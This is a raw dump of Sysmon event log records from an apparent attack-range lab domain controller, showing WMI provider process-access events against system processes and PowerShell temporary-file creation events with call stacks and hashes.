RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239595Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239594Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239593Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239592Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239591Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D99-603E-A9AA-00000000AD01}6956ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0mu0teth.0za.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239590Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239589Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D98-603E-A5AA-00000000AD01}6212ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239588Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239587Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D99-603E-A9AA-00000000AD01}6956ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_kwkhisrk.zav.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239586Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239585Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239584Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239583Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239582Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239581Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239580Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239579Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-ACAA-00000000AD01}4592C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239578Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-ACAA-00000000AD01}4592C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239577Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239576Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239575Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239574Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239573Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll